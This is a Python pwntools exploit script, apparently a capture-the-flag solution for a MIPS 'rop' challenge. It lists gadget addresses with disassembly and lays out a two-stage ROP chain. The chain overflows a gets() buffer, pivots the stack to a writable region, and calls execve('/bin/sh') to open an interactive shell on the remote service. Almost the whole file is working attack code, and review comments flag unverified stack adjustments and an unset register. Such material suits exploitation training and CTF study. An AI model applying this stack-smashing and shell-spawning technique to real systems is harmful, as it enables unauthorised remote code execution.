#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host chal.hkcert23.pwnable.hk --port 28151 rop
from pwn import *
# Set up pwntools for the correct architecture
# Remote endpoint.  HOST=... / PORT=... on the command line override both.
host = args.HOST or 'chal.hkcert23.pwnable.hk'
port = int(args.PORT or 28151)
# The challenge binary (EXE=/path overrides).  Binding it to context.binary
# is what sets pwntools up for the correct architecture.
exe = context.binary = ELF(args.EXE or 'rop')
# Other switches are read from the same `args` mapping, e.g.
#   ./exploit.py DEBUG NOASLR      (dump all traffic, disable ASLR locally)
#   ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
def start_local(argv=[], *a, **kw):
    '''Run the challenge binary on this machine.

    With GDB on the command line the process is launched under gdb with the
    module-level `gdbscript`; otherwise it is a plain pwntools process().
    Extra positional/keyword arguments are forwarded untouched.  The shared
    default list is only read (concatenated), never mutated.
    '''
    cmdline = [exe.path] + argv
    if not args.GDB:
        return process(cmdline, *a, **kw)
    return gdb.debug(cmdline, gdbscript=gdbscript, *a, **kw)
def start_remote(argv=[], *a, **kw):
    '''Open a TCP connection to the remote challenge (host:port).

    `argv` and the extra arguments are accepted only for symmetry with
    start_local() and are not used.  With GDB set on the command line,
    gdb is attached to the connection before it is returned.
    '''
    tube = connect(host, port)
    if args.GDB:
        gdb.attach(tube, gdbscript=gdbscript)
    return tube
def start(argv=[], *a, **kw):
    '''Start the target and return the pwntools tube for it.

    LOCAL on the command line selects start_local(); anything else goes
    through start_remote().  All arguments are passed straight through.
    '''
    launcher = start_local if args.LOCAL else start_remote
    return launcher(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
# Commands handed to gdb when GDB is on the command line: stop once at main,
# then keep running.  The .format() call is a no-op here (no braces) but is
# kept so that {local_name} substitutions keep working if the script grows.
gdbscript = '\n'.join([
    '',
    'tbreak main',
    'continue',
    '',
]).format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: mips-32-big
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX disabled
# PIE: No PIE (0x400000)
# RWX: Has RWX segments
# ---------------------------------------------------------------------------
# Gadget addresses.  The binary is non-PIE (see the checksec summary above),
# so these are absolute.  Each one is followed by the disassembly it was picked
# for.  NOTE(review): the listings stop at `jr ra` / `jalr t9`; on MIPS one
# more instruction executes in the branch delay slot, which is where any
# `addiu sp,sp,N` of a gadget would sit -- the stack adjustments used when the
# chain is laid out below are not visible here, so re-check them against the
# binary if the chain misbehaves.
# ---------------------------------------------------------------------------

# a0 <- s0, then reload ra / s0 from the stack.  Called twice in a row: the
# first pass loads s0, the second pass moves it into a0.
move_a0_s0 = 0x41f650
#   41f650: 02002025 move a0,s0
#   41f654: 8fbf0024 lw ra,36(sp)
#   41f658: 8fb00020 lw s0,32(sp)
#   41f65c: 03e00008 jr ra

# Plain epilogue (ra <- 100(sp), s8 <- 96(sp), sp += 104).  Not referenced by
# the chain below; kept as a documented alternative.
addiu_sp_sp = 0x400840
#   400840: 8fbf0064 lw ra,100(sp)
#   400844: 8fbe0060 lw s8,96(sp)
#   400848: 27bd0068 addiu sp,sp,104
#   40084c: 03e00008 jr ra

# main's own gets() call site.  After the call it does `move sp,s8` and then
# the epilogue above -- i.e. returning here with a controlled s8 both reads a
# second line into a0 and pivots the stack to s8.
gets = 0x400824
#   400824: 8f82806c lw v0,-32660(gp)
#   400828: 0040c825 move t9,v0
#   40082c: 0411212c bal 408ce0 <_IO_gets>
#   400830: 00000000 nop
#   400834: 8fdc0010 lw gp,16(s8)
#   400838: 00001025 move v0,zero
#   40083c: 03c0e825 move sp,s8
#   400840: 8fbf0064 lw ra,100(sp)
#   400844: 8fbe0060 lw s8,96(sp)
#   400848: 27bd0068 addiu sp,sp,104
#   40084c: 03e00008 jr ra

# a2 <- s2 then jalr t9 (t9 <- 40(sp)).  Not referenced by the chain below.
move_a2_s2 = 0x40a9c4
#   40a9c4: 8fb90028 lw t9,40(sp)
#   40a9c8: 02403025 move a2,s2
#   40a9cc: afa20014 sw v0,20(sp)
#   40a9d0: 02473821 addu a3,s2,a3
#   40a9d4: afa40018 sw a0,24(sp)
#   40a9d8: 24a5002c addiu a1,a1,44
#   40a9dc: afb6001c sw s6,28(sp)
#   40a9e0: 02602025 move a0,s3
#   40a9e4: 8fa2002c lw v0,44(sp)
#   40a9e8: 0320f809 jalr t9

# a2 <- s8, a1 <- s3, then jalr to t9 <- 44(sp).  Sets the 2nd/3rd execve
# arguments (s3 is not written anywhere in the chain -- see note below).
move_a2_s8_a1_s3 = 0x40368c
#   40368c: 8fb9002c lw t9,44(sp)
#   403690: 03c03025 move a2,s8
#   403694: 02602825 move a1,s3
#   403698: 0320f809 jalr t9

# Bulk callee-saved register reload (s0..s6 and ra).  Not referenced by the
# chain below; would be the way to give s3 a known value.
lw_s6 = 0x43f52c
#   43f52c: 8fbf0054 lw ra,84(sp)
#   43f530: 8fb60050 lw s6,80(sp)
#   43f534: 8fb5004c lw s5,76(sp)
#   43f538: 8fb40048 lw s4,72(sp)
#   43f53c: 8fb30044 lw s3,68(sp)
#   43f540: 8fb20040 lw s2,64(sp)
#   43f544: 8fb1003c lw s1,60(sp)
#   43f548: 8fb00038 lw s0,56(sp)
#   43f54c: 03e00008 jr ra

# v0 <- s0 (syscall number), ra <- 308(sp).
move_v0_s0 = 0x44f84c
#   44f84c: 8fbf0134 lw ra,308(sp)
#   44f850: 02001025 move v0,s0
#   44f854: 8fb00130 lw s0,304(sp)
#   44f858: 03e00008 jr ra

# Bare syscall instruction; the chain ends here.
syscall = 0x40042c
#   40042c: 0000000c syscall

# execve in the MIPS o32 numbering (4000 + 11).
SYS_execve = 4011

# Writable, fixed address used both as the gets() destination and as the
# pivoted stack (the binary has RWX segments, see the checksec summary).
rw = 0x492400
# Simulated stack pointer, expressed as a byte offset into the buffer the
# current stage is written to.  0x50 is the starting point for stage 1.
sp = 0x50


def move_sp(n, x):
    '''Bump the simulated stack pointer by `n` bytes and return `x` unchanged.

    Intended to be called in value position of a dict display so that the
    offsets of later entries account for a gadget's stack adjustment.
    NOTE(review): this only works if the key expression is evaluated before
    the value; that is guaranteed from Python 3.8 on, not earlier.
    '''
    global sp
    sp = sp + n
    return x
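# ---------------------------------------------------------------------------
# Stage 1: the line main's gets() reads into its stack buffer.
#
# `sp` is the real stack pointer as an offset into that buffer.  0x50 is where
# it lands after main's epilogue (`addiu sp,sp,104`, see the `gets` listing
# above), so main's saved s8 (96(sp)) and ra (100(sp)) are the two words just
# below it.  The offsets are written out as plain statements rather than via
# move_sp() inside a dict display: before Python 3.8 a dict display evaluated
# the VALUE before the KEY, so `{sp + 36: move_sp(40, g)}` would silently have
# placed g 40 bytes too far.  The stack adjustments (+40, +104) are the
# gadgets' delay-slot `addiu sp` values, which the listings do not show.
# ---------------------------------------------------------------------------
stage1 = {}
stage1[sp - 8] = rw             # saved s8 <- rw; becomes sp at `move sp,s8` (pivot)
stage1[sp - 4] = move_a0_s0     # saved ra <- first gadget (a0 <- junk on this pass)
stage1[sp + 32] = rw            # gadget: s0 <- rw
stage1[sp + 36] = move_a0_s0    # gadget: ra <- itself; second pass does a0 <- rw
sp += 40
stage1[sp + 36] = gets          # ra <- main's call site: gets(rw), then pivot to s8
sp += 40
payload = b''
payload += flat(stage1)
payload += b'\n'                # ends the first gets(); the rest is read by gets(rw)

# ---------------------------------------------------------------------------
# Stage 2: read by gets(rw) straight into the RW area, which main's epilogue
# then adopts as the stack (`move sp,s8`, s8 = rw).  Offsets restart at 0 = rw
# and the same epilogue applies (s8 <- 96(sp), ra <- 100(sp), sp += 104).
# Target: execve(a0 = rw -> "/bin/sh", a1 = s3, a2 = 0).
# ---------------------------------------------------------------------------
sp = 0
stage2 = {}
stage2[0] = b'/bin/sh\0'                # execve path; rw points here
stage2[sp + 96] = 0                     # s8 <- 0, later moved into a2 (envp = NULL)
stage2[sp + 100] = move_a2_s8_a1_s3     # ra: a2 <- s8, a1 <- s3, jalr t9
sp += 104
stage2[sp + 44] = move_a0_s0            # t9 <- 44(sp) for that jalr
stage2[sp + 32] = rw                    # s0 <- rw
stage2[sp + 36] = move_a0_s0            # ra; second pass does a0 <- s0 = rw
sp += 40
stage2[sp + 32] = SYS_execve            # s0 <- 4011
stage2[sp + 36] = move_v0_s0            # ra; v0 <- s0 = SYS_execve
sp += 40
stage2[sp + 308] = syscall              # ra <- 308(sp): execve("/bin/sh", s3, 0)
payload += flat(stage2)
# NOTE(review): nothing in this chain writes s3, so a1 (argv) is whatever the
# register holds when the syscall fires -- presumably NULL or a harmless
# pointer on the target.  If the shell does not spawn, load s3 explicitly
# (the unused `lw_s6` gadget reads it from 68(sp)).

# DUMP on the command line writes the raw bytes out for offline inspection.
if args.DUMP:
    with open('payload', 'wb') as fh:
        fh.write(payload)

io = start()
io.sendlineafter(b'input : \n', payload)   # sendline supplies the newline ending gets(rw)
io.interactive()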